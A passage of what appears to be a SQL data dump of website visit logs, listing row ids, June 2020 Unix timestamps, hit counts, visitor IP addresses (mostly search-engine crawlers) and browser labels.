),(512330,1591764972,1,1,0,0,'66.249.70.69','chrome'),(512331,1591765154,1,1,0,0,'213.180.203.16','other'),(512332,1591765158,1,1,0,0,'178.154.200.222','other'),(512333,1591765765,3,3,0,0,'66.249.70.70','chrome'),(512334,1591765974,1,1,0,0,'17.58.99.84','other'),(512335,1591766255,1,1,0,0,'66.249.70.69','chrome'),(512336,1591766433,3,3,0,0,'178.154.200.97','other'),(512337,1591767141,1,1,0,0,'5.44.174.37','chrome'),(512338,1591767409,1,1,0,0,'3.9.24.217','other'),(512339,1591767447,1,1,0,0,'66.249.70.72','chrome'),(512340,1591767474,1,1,0,0,'157.55.39.191','other'),(512341,1591768689,2,2,0,0,'66.249.70.72','chrome'),(512342,1591768736,2,2,0,0,'66.249.70.70','chrome'),(512343,1591768802,2,2,0,0,'91.196.177.46','chrome'),(512344,1591768826,1,1,0,0,'207.46.13.167','other'),(512345,1591769514,1,1,0,0,'178.154.200.196','other'),(512346,1591770143,2,2,0,0,'66.249.70.69','chrome'),(512347,1591770245,1,1,0,0,'178.154.200.220','other'),(512348,1591770392,1,1,0,0,'66.249.70.72','chrome'),(512349,1591770512,1,1,0,0,'66.249.70.70','chrome'),(512350,1591770582,1,1,0,0,'157.55.39.52','other'),(512351,1591770967,2,2,0,0,'66.249.64.36','chrome'),(512352,1591771097,1,1,0,0,'157.55.39.157','other'),(512353,1591771860,2,2,0,0,'66.249.70.72','chrome'),(512354,1591772507,1,1,0,0,'157.55.39.157','other'),(512355,1591772537,1,1,0,0,'8.29.198.25','other'),(512356,1591772556,1,1,0,0,'8.29.198.27','other'),(512357,1591772698,1,1,0,0,'213.180.203.16','other'),(512358,1591772715,1,1,0,0,'66.249.64.36','chrome'),(512359,1591772807,1,1,0,0,'66.249.64.38','chrome'),(512360,1591773446,1,1,0,0,'104.203.102.231','chrome'),(512361,1591773451,1,1,0,0,'107.172.56.222','chrome'),(512362,1591773484,1,1,0,0,'23.89.247.82','chrome'),(512363,1591773522,1,1,0,0,'157.55.39.157','other'),(512364,1591773566,2,2,0,0,'207.46.13.167','other'),(512365,1591773709,1,1,0,0,'157.55.39.191','other'),(512366,1591773713,1,1,0,0,'157.55.39.52','other'),(512367,1591773725,1,1,0,0,'178.154.200.220','other'),(512368,1591774320,1,1,0,0,'66.249.64.33','chrome'),(512369,1591774372,1,1,0,0,'178.154.200.87','other'),(512370,1591774487,1,1,0,0,'66.249.70.69','chrome'),(512371,1591774556,1,1,0,0,'131.220.6.152','chrome'),(512372,1591774618,1,1,0,0,'207.46.13.167','other'),(512373,1591775026,1,1,0,0,'66.249.70.70','chrome'),(512374,1591775579,1,1,0,0,'17.58.99.84','other'),(512375,1591776002,1,1,0,0,'157.55.39.52','other'),(512376,1591776154,1,1,0,0,'213.180.203.17','other'),(512377,1591776674,3,3,0,0,'66.249.70.69','chrome'),(512378,1591777062,1,1,0,0,'91.196.178.164','chrome'),(512379,1591777122,1,1,0,0,'37.73.76.220','chrome'),(512380,1591777520,1,1,0,0,'17.58.99.84','other'),(512381,1591778013,2,2,0,0,'66.249.70.72','chrome'),(512382,1591778290,2,2,0,0,'66.249.70.69','chrome'),(512383,1591779151,1,1,0,0,'66.249.64.36','chrome'),(512384,1591779583,1,1,0,0,'66.249.64.33','chrome'),(512385,1591780073,1,1,0,0,'66.249.64.38','chrome'),(512386,1591780594,1,1,0,0,'178.154.200.229','other'),(512387,1591780631,1,1,0,0,'66.249.70.69','chrome'),(512388,1591781154,1,1,0,0,'17.58.99.84','other'),(512389,1591781600,8,8,0,0,'77.120.98.235','other'),(512390,1591781649,2,2,0,0,'91.215.70.200','chrome'),(512391,1591781684,3,3,0,0,'66.249.70.72','chrome'),(512392,1591781736,2,2,0,0,'66.249.70.70','chrome'),(512393,1591782422,5,5,0,0,'66.249.70.69','chrome'),(512394,1591782617,1,1,0,0,'157.55.39.52','other'),(512395,1591782743,1,1,0,0,'91.196.178.71','chrome'),(512396,1591782946,1,1,0,0,'91.196.178.186','chrome'),(512397,1591783145,1,1,0,0,'66.249.70.72','chrome'),(512398,1591783229,1,1,0,0,'91.196.178.68','chrome'),(512399,1591783371,1,1,0,0,'8.29.198.26','other'),(512400,1591783396,1,1,0,0,'8.29.198.27','other'),(512401,1591783714,1,1,0,0,'66.249.70.70','chrome'),(512402,1591783965,1,1,0,0,'157.55.39.52','other'),(512403,1591784020,1,1,0,0,'3.209.56.180','chrome'),(512404,1591784657,1,1,0,0,'66.249.70.72','chrome'),(512405,1591785063,1,1,0,0,'66.249.64.36','chrome'),(512406,1591785322,1,1,0,0,'66.249.64.33','chrome'),(512407,1591785445,1,1,0,0,'88.155.166.211','chrome'),(512408,1591785570,1,1,0,0,'66.249.70.70','chrome'),(512409,1591785577,1,1,0,0,'66.249.64.38','chrome'),(512410,1591785673,2,2,0,0,'66.249.70.72','chrome'),(512411,1591786738,1,1,0,0,'176.121.8.39','chrome'),(512412,1591786831,1,0,1,0,'66.249.70.70',''),(512413,1591786835,1,1,0,0,'207.46.13.138','other'),(512414,1591786910,1,1,0,0,'66.249.70.72','chrome'),(512415,1591786926,1,1,0,0,'109.74.154.72','chrome'),(512416,1591787068,1,1,0,0,'157.55.39.191','other'),(512417,1591787384,2,2,0,0,'95.213.141.126','opera'),(512418,1591787544,1,1,0,0,'66.249.64.36','chrome'),(512419,1591788085,1,1,0,0,'91.196.178.108','other'),(512420,1591788306,1,1,0,0,'66.249.70.72','chrome'),(512421,1591788366,1,1,0,0,'207.46.13.138','other'),(512422,1591788800,1,1,0,0,'91.196.178.71','chrome'),(512423,1591788831,1,1,0,0,'66.249.70.69','chrome'),(512424,1591789068,1,1,0,0,'157.55.39.52','other'),(512425,1591789104,1,1,0,0,'128.124.0.170','chrome'),(512426,1591789186,1,1,0,0,'178.154.200.112','other'),(512427,1591789887,1,1,0,0,'178.154.200.236','other'),(512428,1591790396,2,2,0,0,'157.55.39.52','other'),(512429,1591790606,1,1,0,0,'195.211.175.88','chrome'),(512430,1591790672,2,2,0,0,'66.249.64.38','chrome'),(512431,1591791033,1,1,0,0,'178.154.200.92','other'),(512432,1591791115,1,1,0,0,'17.58.99.84','other'),(512433,1591791354,1,1,0,0,'195.114.147.108','chrome'),(512434,1591791361,1,1,0,0,'66.249.70.70','chrome'),(512435,1591791395,1,1,0,0,'178.154.200.220','other'),(512436,1591791614,1,1,0,0,'91.196.178.169','chrome'),(512437,1591791688,1,1,0,0,'157.55.39.52','other'),(512438,1591792076,1,1,0,0,'91.196.178.74','firefox'),(512439,1591792580,2,2,0,0,'66.249.70.72','chrome'),(512440,1591792720,1,1,0,0,'193.106.30.99','firefox'),(512441,1591793062,1,1,0,0,'207.46.13.138','other'),(512442,1591793844,2,2,0,0,'37.53.200.145','chrome'),(512443,1591794002,2,2,0,0,'66.249.70.72','chrome'),(512444,1591794064,1,1,0,0,'66.249.70.70','chrome'),(512445,1591794204,1,1,0,0,'8.29.198.27','other'),(512446,1591794235,1,1,0,0,'8.29.198.26','other'),(512447,1591794243,1,1,0,0,'207.46.13.167','other'),(512448,1591794693,1,1,0,0,'207.46.13.138','other'),(512449,1591794839,1,1,0,0,'157.55.39.52','other'),(512450,1591795275,2,2,0,0,'66.249.70.70','chrome'),(512451,1591795914,1,1,0,0,'66.249.70.72','chrome'),(512452,1591795928,1,1,0,0,'157.55.39.52','other'),(512453,1591796331,1,1,0,0,'66.249.70.70','chrome'),(512454,1591796739,2,2,0,0,'17.58.99.84','other'),(512455,1591797107,2,2,0,0,'207.46.13.167','other'),(512456,1591797455,1,1,0,0,'212.57.104.55','firefox'),(512457,1591798045,1,1,0,0,'66.249.70.70','chrome'),(512458,1591798624,1,1,0,0,'66.249.70.69','chrome'),(512459,1591799247,1,1,0,0,'157.55.39.191','other'),(512460,1591799415,1,0,1,0,'84.17.36.59',''),(512461,1591800384,1,1,0,0,'66.249.70.70','chrome'),(512462,1591800668,2,2,0,0,'207.46.13.167','other'),(512463,1591800897,1,1,0,0,'157.55.39.52','other'),(512464,1591800994,1,1,0,0,'66.249.70.72','chrome'),(512465,1591801155,1,1,0,0,'66.249.64.36','chrome'),(512466,1591802045,1,1,0,0,'17.58.99.84','other'),(512467,1591802849,1,1,0,0,'66.249.64.38','chrome'),(512468,1591802931,1,1,0,0,'207.46.13.167','other'),(512469,1591803150,2,2,0,0,'157.55.39.191','other'),(512470,1591803169,1,1,0,0,'157.55.39.52','other'),(512471,1591803783,1,1,0,0,'66.249.64.36','chrome'),(512472,1591804004,1,1,0,0,'66.249.70.72','chrome'),(512473,1591804304,1,1,0,0,'207.46.13.138','other'),(512474,1591804464,1,1,0,0,'66.249.70.69','chrome'),(512475,1591804893,1,1,0,0,'157.55.39.52','other'),(512476,1591805039,1,1,0,0,'8.29.198.26','other'),(512477,1591805066,1,1,0,0,'8.29.198.25','other'),(512478,1591805284,1,1,0,0,'91.235.142.217','firefox'),(512479,1591805705,2,2,0,0,'66.249.70.72','chrome'),(512480,1591806039,1,1,0,0,'66.249.64.36','chrome'),(512481,1591806190,1,1,0,0,'17.58.99.84','other'),(512482,1591806664,1,1,0,0,'66.249.70.69','chrome'),(512483,1591806670,1,1,0,0,'207.46.13.138','other'),(512484,1591807293,1,1,0,0,'157.55.39.52','other'),(512485,1591807950,1,1,0,0,'66.249.64.33','chrome'),(512486,1591808393,1,1,0,0,'17.58.99.84','other'),(512487,1591809193,1,1,0,0,'157.55.39.191','other'),(512488,1591809888,3,3,0,0,'66.249.70.72','chrome'),(512489,1591809928,1,1,0,0,'95.215.223.235','chrome'),(512490,1591810312,1,1,0,0,'207.46.13.167','other'),(512491,1591810462,1,1,0,0,'66.249.70.69','chrome'),(512492,1591810818,1,1,0,0,'178.151.22.63','chrome'),(512493,1591810825,1,1,0,0,'66.249.70.70','chrome'),(512494,1591811217,1,1,0,0,'66.249.70.72','chrome'),(512495,1591811391,1,1,0,0,'66.249.64.38','chrome'),(512496,1591811724,1,1,0,0,'157.55.39.191','other'),(512497,1591811931,1,1,0,0,'66.249.70.70','chrome'),(512498,1591812158,1,1,0,0,'207.46.13.138','other'),(512499,1591812235,1,1,0,0,'178.154.200.97','other'),(512500,1591814561,1,1,0,0,'157.55.39.52','other'),(512501,1591815093,1,1,0,0,'207.46.13.167','other'),(512502,1591815224,1,1,0,0,'213.180.203.95','other'),(512503,1591815875,2,2,0,0,'8.29.198.25','other'),(512504,1591815972,1,1,0,0,'157.55.39.52','other'),(512505,1591816184,1,1,0,0,'207.46.13.167','other'),(512506,1591816559,1,1,0,0,'37.73.168.253','chrome'),(512507,1591817116,1,1,0,0,'66.249.70.72','chrome'),(512508,1591817147,1,1,0,0,'178.154.200.236','chrome'),(512509,1591817328,1,1,0,0,'66.249.64.33','chrome'),(512510,1591817413,1,1,0,0,'66.249.70.69','chrome'),(512511,1591818550,1,1,0,0,'157.55.39.52','other'),(512512,1591818582,1,1,0,0,'66.249.64.36','chrome'),(512513,1591819386,2,2,0,0,'207.46.13.167','other'),(512514,1591819397,1,1,0,0,'207.46.13.138','other'),(512515,1591819504,2,2,0,0,'66.249.70.70','chrome'),(512516,1591819937,1,1,0,0,'157.55.39.191','other'),(512517,1591819966,1,1,0,0,'66.249.70.69','chrome'),(512518,1591819981,1,1,0,0,'66.249.64.33','chrome'),(512519,1591820385,1,1,0,0,'66.249.64.36','chrome'),(512520,1591820628,1,1,0,0,'178.154.200.196','chrome'),(512521,1591820748,1,1,0,0,'66.249.70.70','chrome'),(512522,1591820786,1,1,0,0,'66.249.70.72','chrome'),(512523,1591820840,2,2,0,0,'207.46.13.167','other'),(512524,1591821381,1,1,0,0,'66.249.70.69','chrome'),(512525,1591821395,8,8,0,0,'77.120.98.235','other'),(512526,1591821551,1,1,0,0,'207.46.13.138','other'),(512527,1591821933,2,2,0,0,'207.46.13.167','other'),(512528,1591822182,1,1,0,0,'66.249.64.38','chrome'),(512529,1591822410,1,1,0,0,'157.55.39.52','other'),(512530,1591822557,2,2,0,0,'66.249.70.69','chrome'),(512531,1591822805,2,2,0,0,'66.249.70.72','chrome'),(512532,1591822812,2,2,0,0,'66.249.70.70','chrome'),(512533,1591823898,1,1,0,0,'157.55.39.191','other'),(512534,1591824263,1,1,0,0,'157.55.39.52','other'),(512535,1591825256,1,1,0,0,'66.249.70.70','chrome'),(512536,1591825285,1,1,0,0,'207.46.13.138','other'),(512537,1591826458,1,1,0,0,'157.55.39.52','other'),(512538,1591826705,2,2,0,0,'8.29.198.27','other'),(512539,1591826778,1,1,0,0,'66.249.64.38','chrome'),(512540,1591826785,1,1,0,0,'66.249.70.70','chrome'),(512541,1591827652,1,1,0,0,'66.249.64.36','chrome'),(512542,1591827706,2,2,0,0,'66.249.70.69','chrome'),(512543,1591827812,1,1,0,0,'66.249.70.70','chrome'),(512544,1591827913,1,1,0,0,'66.249.64.38','chrome'),(512545,1591828308,1,1,0,0,'66.249.70.72','chrome'),(512546,1591828540,1,1,0,0,'194.61.24.94','other'),(512547,1591828801,1,1,0,0,'178.154.200.222','other'),(512548,1591829079,1,1,0,0,'157.55.39.52','other'),(512549,1591829725,2,2,0,0,'66.249.70.72','chrome'),(512550,1591829801,3,3,0,0,'207.46.13.167','other'),(512551,1591830076,2,2,0,0,'157.55.39.52','other'),(512552,1591830193,1,1,0,0,'207.46.13.138','other'),(512553,1591830937,1,1,0,0,'66.249.70.70','chrome'),(512554,1591831075,2,2,0,0,'207.46.13.167','other'),(512555,1591831263,1,1,0,0,'207.46.13.138','other'),(512556,1591831814,2,2,0,0,'66.249.70.72','chrome'),(512557,1591832139,1,1,0,0,'157.55.39.191','other'),(512558,1591832781,2,2,0,0,'207.46.13.167','other'),(512559,1591832861,1,1,0,0,'157.55.39.52','other'),(512560,1591833307,1,1,0,0,'62.205.134.182','other'),(512561,1591833433,2,2,0,0,'66.249.70.72','chrome'),(512562,1591833802,1,1,0,0,'207.46.13.167','other'),(512563,1591834225,1,1,0,0,'52.183.70.32','chrome'),(512564,1591834239,1,1,0,0,'207.46.13.138','other'),(512565,1591834310,1,1,0,0,'5.44.174.37','chrome'),(512566,1591835466,1,1,0,0,'66.249.70.69','chrome'),(512567,1591835535,1,1,0,0,'207.46.13.167','other'),(512568,1591836131,1,1,0,0,'178.154.200.87','other'),(512569,1591836212,1,1,0,0,'157.55.39.52','other'),(512570,1591836241,1,1,0,0,'157.55.39.191','other'),(512571,1591836315,1,1,0,0,'213.180.203.122','other'),(512572,1591836749,2,2,0,0,'207.46.13.138','other'),(512573,1591836828,1,1,0,0,'178.154.200.222','other'),(512574,1591837472,1,1,0,0,'213.180.203.95','other'),(512575,1591837533,1,1,0,0,'8.29.198.26','other'),(512576,1591837573,1,1,0,0,'8.29.198.25','other'),(512577,1591839234,1,1,0,0,'66.249.70.70','chrome'),(512578,1591839339,1,1,0,0,'66.249.70.72','chrome'),(512579,1591839477,1,1,0,0,'157.55.39.52','other'),(512580,1591839718,1,1,0,0,'157.55.39.191','other'),(512581,1591839962,1,1,0,0,'207.46.13.167','other'),(512582,1591840412,1,1,0,0,'157.55.39.52','other'),(512583,1591840939,1,1,0,0,'178.154.200.222','other'),(512584,1591841472,1,1,0,0,'66.249.64.38','chrome'),(512585,1591841905,1,1,0,0,'178.159.37.88','chrome'),(512586,1591843003,3,3,0,0,'66.249.70.70','chrome'),(512587,1591843932,2,2,0,0,'66.249.70.69','chrome'),(512588,1591844001,1,1,0,0,'207.46.13.167','other'),(512589,1591844514,1,1,0,0,'66.249.70.72','chrome'),(512590,1591845246,1,1,0,0,'66.249.64.36','chrome'),(512591,1591845518,1,1,0,0,'207.46.13.167','other'),(512592,1591845622,1,1,0,0,'66.249.70.70','chrome'),(512593,1591845908,1,1,0,0,'66.249.64.33','chrome'),(512594,1591846053,1,1,0,0,'207.46.13.138','other'),(512595,1591847314,2,2,0,0,'66.249.70.72','chrome'),(512596,1591848373,2,2,0,0,'8.29.198.25','other'),(512597,1591848471,2,1,1,0,'66.249.70.69',''),(512598,1591849272,2,2,0,0,'66.249.70.69','chrome'),(512599,1591850209,1,1,0,0,'207.46.13.138','other'),(512600,1591850289,1,1,0,0,'157.55.39.191','other'),(512601,1591850981,1,1,0,0,'207.46.13.167','other'),(512602,1591851120,1,1,0,0,'62.205.134.182','other'),(512603,1591851288,1,1,0,0,'66.249.70.72','chrome'),(512604,1591851661,1,1,0,0,'207.46.13.138','other'),(512605,1591853244,2,2,0,0,'66.249.70.69','chrome'),(512606,1591853262,1,1,0,0,'66.249.64.38','chrome'),(512607,1591853401,1,1,0,0,'66.249.64.33','chrome'),(512608,1591853558,1,1,0,0,'66.249.70.70','chrome'),(512609,1591854323,1,1,0,0,'66.249.70.72','chrome'),(512610,1591855253,1,1,0,0,'66.249.64.38','chrome'),(512611,1591855671,1,1,0,0,'66.249.70.69','chrome'),(512612,1591855691,1,1,0,0,'157.55.39.52','other'),(512613,1591856218,1,1,0,0,'207.46.13.138','other'),(512614,1591856812,8,8,0,0,'77.120.98.235','other'),(512615,1591857167,2,2,0,0,'66.249.70.70','chrome'),(512616,1591857354,1,1,0,0,'91.196.178.106','chrome'),(512617,1591857357,1,1,0,0,'74.125.210.73','chrome'),(512618,1591857667,1,1,0,0,'157.55.39.52','other'),(512619,1591858071,1,1,0,0,'66.249.70.70','chrome'),(512620,1591858309,1,1,0,0,'207.46.13.138','other'),(512621,1591858363,1,1,0,0,'95.217.115.62','other'),(512622,1591858378,1,1,0,0,'161.35.86.124','chrome'),(512623,1591859207,2,2,0,0,'8.29.198.27','other'),(512624,1591859497,2,2,0,0,'66.249.70.70','chrome'),(512625,1591859735,2,2,0,0,'91.196.178.184','chrome'),(512626,1591860373,1,1,0,0,'185.15.56.22','other'),(512627,1591860442,1,1,0,0,'157.55.39.191','other'),(512628,1591860641,1,1,0,0,'157.55.39.52','other'),(512629,1591860857,1,1,0,0,'131.220.6.152','chrome'),(512630,1591861360,1,1,0,0,'157.55.39.191','other'),(512631,1591862132,1,0,1,0,'66.249.70.72',''),(512632,1591862436,1,1,0,0,'66.249.70.72','chrome'),(512633,1591863414,1,1,0,0,'213.180.203.17','other'),(512634,1591864244,1,1,0,0,'195.211.175.37','chrome'),(512635,1591865073,1,1,0,0,'91.196.178.28','chrome'),(512636,1591865206,1,1,0,0,'178.154.200.112','other'),(512637,1591865378,2,2,0,0,'207.46.13.167','other'),(512638,1591867473,1,1,0,0,'18.222.42.175','chrome'),(512639,1591867681,1,1,0,0,'66.249.70.69','chrome'),(512640,1591867873,1,1,0,0,'91.196.178.71','chrome'),(512641,1591868659,1,1,0,0,'178.154.200.246','other'),(512642,1591868857,2,2,0,0,'207.46.13.138','other'),(512643,1591869296,1,1,0,0,'5.44.174.37','chrome'),(512644,1591869411,2,2,0,0,'157.55.39.52','other'),(512645,1591869462,1,1,0,0,'66.249.70.69','chrome'),(512646,1591869571,1,1,0,0,'31.13.127.117','other'),(512647,1591869572,1,1,0,0,'31.13.127.116','other'),(512648,1591869897,1,1,0,0,'178.154.200.222','other'),(512649,1591870040,1,1,0,0,'8.29.198.26','other'),(512650,1591870069,1,1,0,0,'8.29.198.25','other'),(512651,1591870234,1,1,0,0,'207.46.13.167','other'),(512652,1591870483,1,1,0,0,'213.180.203.16','other'),(512653,1591870664,1,1,0,0,'193.151.56.200','chrome'),(512654,1591871036,1,1,0,0,'178.154.200.222','other'),(512655,1591873057,2,2,0,0,'178.154.200.216','other'),(512656,1591873069,1,1,0,0,'193.151.56.200','chrome'),(512657,1591873093,1,1,0,0,'109.74.154.72','chrome'),(512658,1591873309,1,1,0,0,'66.249.70.69','chrome'),(512659,1591873631,1,1,0,0,'207.46.13.167','other'),(512660,1591873635,1,1,0,0,'157.55.39.52','other'),(512661,1591874254,1,1,0,0,'66.249.70.70','chrome'),(512662,1591874632,1,1,0,0,'207.46.13.138','other'),(512663,1591875199,1,1,0,0,'91.196.178.71','chrome'),(512664,1591875663,1,1,0,0,'66.249.70.70','chrome'),(512665,1591876199,2,2,0,0,'178.154.200.222','other'),(512666,1591876237,1,1,0,0,'66.249.70.69','chrome'),(512667,1591876724,1,1,0,0,'66.249.70.70','chrome'),(512668,1591876868,1,1,0,0,'207.46.13.167','other'),(512669,1591877122,2,2,0,0,'157.55.39.52','other'),(512670,1591877266,2,2,0,0,'207.46.13.138','other'),(512671,1591877921,1,1,0,0,'178.154.200.220','other'),(512672,1591878741,1,0,1,0,'66.249.70.70',''),(512673,1591878743,1,1,0,0,'66.249.70.72','chrome'),(512674,1591878799,9,9,0,0,'66.249.70.70','chrome'),(512675,1591878803,33,33,0,0,'66.249.70.69','chrome'),(512676,1591879183,1,1,0,0,'157.55.39.52','other'),(512677,1591879344,1,1,0,0,'91.196.178.71','chrome'),(512678,1591880381,1,1,0,0,'207.46.13.167','other'),(512679,1591880872,2,2,0,0,'8.29.198.26','other'),(512680,1591881067,1,1,0,0,'91.196.178.71','chrome'),(512681,1591881571,2,2,0,0,'91.196.178.173','chrome'),(512682,1591882409,1,1,0,0,'17.58.99.7','other'),(512683,1591882972,1,1,0,0,'207.46.13.167','other'),(512684,1591883090,1,1,0,0,'207.46.13.138','other'),(512685,1591883407,1,1,0,0,'213.180.203.142','other'),(512686,1591883694,1,1,0,0,'92.113.127.66','chrome'),(512687,1591884453,1,1,0,0,'207.46.13.138','other'),(512688,1591885277,1,1,0,0,'157.55.39.191','other'),(512689,1591885861,1,1,0,0,'207.46.13.167','other'),(512690,1591886885,1,1,0,0,'157.55.39.191','other'),(512691,1591887349,1,1,0,0,'91.196.177.46','chrome'),(512692,1591887427,1,1,0,0,'178.154.200.119','other'),(512693,1591887624,1,1,0,0,'207.46.13.167','other'),(512694,1591887982,1,0,1,0,'66.249.70.69',''),(512695,1591888377,1,1,0,0,'66.249.70.70','chrome'),(512696,1591888586,1,1,0,0,'66.249.70.72','chrome'),(512697,1591888804,1,1,0,0,'66.249.70.69','chrome'),(512698,1591888897,1,1,0,0,'40.77.202.144','other'),(512699,1591888921,2,2,0,0,'207.46.13.167','other'),(512700,1591889002,8,8,0,0,'77.120.98.235','other'),(512701,1591889411,1,1,0,0,'66.249.70.70','chrome'),(512702,1591889780,1,1,0,0,'157.55.39.191','other'),(512703,1591889863,1,1,0,0,'66.249.70.72','chrome'),(512704,1591890416,42,42,0,0,'144.76.40.222','other'),(512705,1591890617,1,1,0,0,'207.46.13.138','other'),(512706,1591891702,1,1,0,0,'8.29.198.27','other'),(512707,1591891731,1,1,0,0,'8.29.198.25','other'),(512708,1591892626,2,2,0,0,'207.46.13.138','other'),(512709,1591893457,1,1,0,0,'178.154.200.222','other'),(512710,1591893726,1,1,0,0,'157.55.39.191','other'),(512711,1591893805,1,1,0,0,'91.196.178.51','chrome'),(512712,1591893916,2,2,0,0,'66.249.70.69','chrome'),(512713,1591894739,2,2,0,0,'207.46.13.167','other'),(512714,1591894968,1,1,0,0,'157.55.39.191','other'),(512715,1591895016,1,0,1,0,'66.249.70.70',''),(512716,1591895331,1,1,0,0,'66.249.64.38','chrome'),(512717,1591895855,1,1,0,0,'66.249.70.69','chrome'),(512718,1591896066,1,1,0,0,'52.45.118.85','firefox'),(512719,1591896377,1,1,0,0,'207.46.13.167','other'),(512720,1591897098,1,1,0,0,'157.55.39.191','other'),(512721,1591897504,1,1,0,0,'207.46.13.167','other'),(512722,1591898060,1,1,0,0,'66.249.64.36','chrome'),(512723,1591898302,1,1,0,0,'157.55.39.52','other'),(512724,1591898591,1,1,0,0,'66.249.70.70','chrome'),(512725,1591899140,1,1,0,0,'157.55.39.191','other'),(512726,1591899520,2,2,0,0,'207.46.13.167','other'),(512727,1591899562,2,2,0,0,'88.99.2.203','other'),(512728,1591900268,1,1,0,0,'207.46.13.138','other'),(512729,1591900500,2,2,0,0,'88.99.2.203','other'),(512730,1591900616,1,1,0,0,'178.154.200.220','other'),(512731,1591901173,1,1,0,0,'66.249.70.72','chrome'),(512732,1591901667,1,1,0,0,'88.99.2.203','other'),(512733,1591902533,1,1,0,0,'8.29.198.25','other'),(512734,1591902568,1,1,0,0,'8.29.198.27','other'),(512735,1591902825,1,1,0,0,'66.249.64.33','chrome'),(512736,1591902942,1,1,0,0,'157.55.39.52','other'),(512737,1591902956,1,1,0,0,'88.99.2.203','other'),(512738,1591903086,1,1,0,0,'37.73.85.122','chrome'),(512739,1591903239,1,1,0,0,'91.196.178.182','chrome'),(512740,1591903285,1,1,0,0,'178.154.200.220','other'),(512741,1591903531,1,1,0,0,'178.154.200.87','other'),(512742,1591903851,1,1,0,0,'66.249.70.69','chrome'),(512743,1591903969,1,1,0,0,'88.99.2.203','other'),(512744,1591904385,1,1,0,0,'66.249.70.70','chrome'),(512745,1591904466,1,1,0,0,'66.249.64.33','chrome'),(512746,1591904560,1,1,0,0,'157.55.39.191','other'),(512747,1591904821,1,1,0,0,'66.249.70.69','chrome'),(512748,1591904875,1,1,0,0,'88.99.2.203','other'),(512749,1591905025,1,1,0,0,'64.202.184.249','firefox'),(512750,1591905085,1,1,0,0,'213.180.203.95','other'),(512751,1591905525,3,3,0,0,'66.249.70.70','chrome'),(512752,1591905744,1,1,0,0,'66.249.64.38','chrome'),(512753,1591905782,1,1,0,0,'88.99.2.203','other'),(512755,1591906026,2,2,0,0,'157.55.39.52','other'),(512756,1591906429,1,1,0,0,'66.249.70.70','chrome'),(512757,1591906752,1,1,0,0,'88.99.2.203','other'),(512758,1591907269,1,1,0,0,'207.46.13.167','other'),(512759,1591908011,1,1,0,0,'66.249.70.70','chrome'),(512760,1591908381,1,1,0,0,'157.55.39.191','other'),(512761,1591908893,1,1,0,0,'2.47.39.215','other'),(512762,1591909180,1,1,0,0,'46.188.98.10','msie'),(512763,1591910125,1,1,0,0,'66.249.70.72','chrome'),(512764,1591910214,1,1,0,0,'178.154.200.196','other'),(512765,1591910319,1,1,0,0,'66.249.70.69','chrome'),(512766,1591911504,1,1,0,0,'13.66.139.0','other'),(512767,1591911840,1,1,0,0,'213.180.203.17','other'),(512768,1591912044,1,1,0,0,'194.61.24.94','other'),(512769,1591912747,1,1,0,0,'178.154.200.131','other'),(512770,1591912794,1,1,0,0,'66.249.64.33','chrome'),(512771,1591913072,1,1,0,0,'66.249.70.70','chrome'),(512772,1591913368,1,1,0,0,'8.29.198.26','other'),(512773,1591913398,1,1,0,0,'8.29.198.25','other'),(512774,1591913446,1,1,0,0,'167.172.97.142','firefox'),(512775,1591914031,1,1,0,0,'13.66.139.0','other'),(512776,1591914421,1,1,0,0,'207.46.13.167','other'),(512777,1591914689,1,1,0,0,'51.77.52.160','chrome'),(512778,1591914841,1,1,0,0,'91.196.178.46','chrome'),(512779,1591914879,1,1,0,0,'66.249.70.69','chrome'),(512780,1591914994,1,1,0,0,'66.249.70.70','chrome'),(512781,1591915451,1,1,0,0,'178.154.200.222','other'),(512782,1591915518,1,1,0,0,'51.91.129.4','firefox'),(512783,1591915587,1,1,0,0,'178.154.200.45','other'),(512784,1591915883,1,1,0,0,'207.46.13.167','other'),(512785,1591916385,1,1,0,0,'66.249.70.70','chrome'),(512786,1591916656,1,1,0,0,'192.99.149.195','firefox'),(512787,1591917334,1,0,1,0,'66.249.70.70',''),(512788,1591917708,1,1,0,0,'45.136.108.44','other'),(512789,1591918278,1,1,0,0,'178.154.200.220','other'),(512790,1591919264,1,1,0,0,'66.249.70.70','chrome'),(512791,1591919300,1,1,0,0,'157.55.39.52','other'),(512792,1591919706,1,1,0,0,'62.205.134.182','other'),(512793,1591920087,8,8,0,0,'77.120.98.235','other'),(512794,1591921246,1,1,0,0,'178.154.200.112','other'),(512795,1591922202,2,2,0,0,'157.55.39.52','other'),(512796,1591922659,1,1,0,0,'207.46.13.138','other'),(512797,1591923655,2,2,0,0,'66.249.70.69','chrome'),(512798,1591923853,1,1,0,0,'157.55.39.191','other'),(512799,1591924205,1,1,0,0,'8.29.198.25','other'),(512800,1591924224,1,1,0,0,'8.29.198.27','other'),(512801,1591924855,1,1,0,0,'66.249.70.69','chrome'),(512802,1591925403,1,1,0,0,'66.249.64.38','chrome'),(512803,1591925521,1,1,0,0,'157.55.39.52','other'),(512804,1591926576,1,1,0,0,'66.249.64.38','chrome'),(512805,1591926899,2,2,0,0,'66.249.70.69','chrome'),(512806,1591927420,1,1,0,0,'157.55.39.52','other'),(512807,1591927834,1,1,0,0,'207.46.13.138','other'),(512808,1591928032,1,1,0,0,'213.180.203.155','other'),(512809,1591928195,1,1,0,0,'84.17.46.156','other'),(512810,1591928976,1,1,0,0,'157.55.39.191','other'),(512811,1591929255,1,1,0,0,'66.249.70.70','chrome'),(512812,1591929263,1,1,0,0,'66.249.64.38','chrome'),(512813,1591929689,4,4,0,0,'66.249.70.69','chrome'),(512814,1591929848,1,1,0,0,'139.59.188.202','firefox'),(512815,1591930481,1,1,0,0,'66.249.64.38','chrome'),(512816,1591931154,1,1,0,0,'157.55.39.191','other'),(512817,1591932130,1,1,0,0,'66.249.70.69','chrome'),(512818,1591932522,2,2,0,0,'66.249.70.72','chrome'),(512819,1591933205,1,1,0,0,'207.46.13.138','other'),(512820,1591934650,1,1,0,0,'192.99.37.138','other'),(512821,1591934698,1,1,0,0,'66.249.70.70','chrome'),(512822,1591935035,1,1,0,0,'8.29.198.27','other'),(512823,1591935055,1,1,0,0,'8.29.198.25','other'),(512824,1591936133,1,1,0,0,'45.12.220.168','other'),(512825,1591936681,1,1,0,0,'66.249.70.72','chrome'),(512826,1591937127,1,1,0,0,'207.46.13.138','other'),(512827,1591937700,1,1,0,0,'62.205.134.182','other'),(512828,1591937707,1,1,0,0,'66.249.70.69','chrome'),(512829,1591937927,1,1,0,0,'216.38.28.47','firefox'),(512830,1591938690,1,1,0,0,'66.249.64.33','chrome'),(512831,1591938750,1,1,0,0,'66.249.70.69','chrome'),(512832,15919